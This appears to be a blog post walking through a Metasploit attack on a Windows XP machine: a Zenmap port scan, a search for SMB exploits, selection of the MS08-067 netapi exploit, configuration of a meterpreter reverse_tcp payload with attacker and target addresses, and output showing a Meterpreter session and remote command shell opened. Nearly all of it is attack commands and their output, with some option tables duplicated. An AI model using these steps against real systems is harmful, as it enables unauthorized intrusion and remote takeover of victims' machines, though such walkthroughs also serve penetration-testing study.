result :
Service Enumeration :
Result of Zenmap is
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Result of Zenmap is
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2. Next step is vulnerability assessment
open msfconsole, then type search smb and probably you will see
exploit/windows/smb/ms06_066_nwapi 2006-11-14 good Microsoft Services MS06-066 nwapi32.dll
exploit/windows/smb/ms06_066_nwwks 2006-11-14 good Microsoft Services MS06-066 nwwks.dll
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
exploit/windows/smb/ms07_029_msdns_zonename 2007-04-12 manual Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption
exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
3. Then type on msfconsole, we use ms08_067_netapi which great value
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
4. After chose exploit we need to set payload with command
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST
LHOST is My IP
RHOST is Target IP
set LHOST 192.168.43.1 (My IP)
set RHOST 192.168.43.128 (Target IP)
set LPORT 4444
to check type show option
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.43.128 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.43.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.43.128 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.43.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
5. Then type exploit to start exploitation target. To go into cmd you can type shell
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.43.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.43.128
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.128:1036) at 2012-09-11 00:56:55 +0700
meterpreter > shell
Process 380 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Tidak ada komentar:
Posting Komentar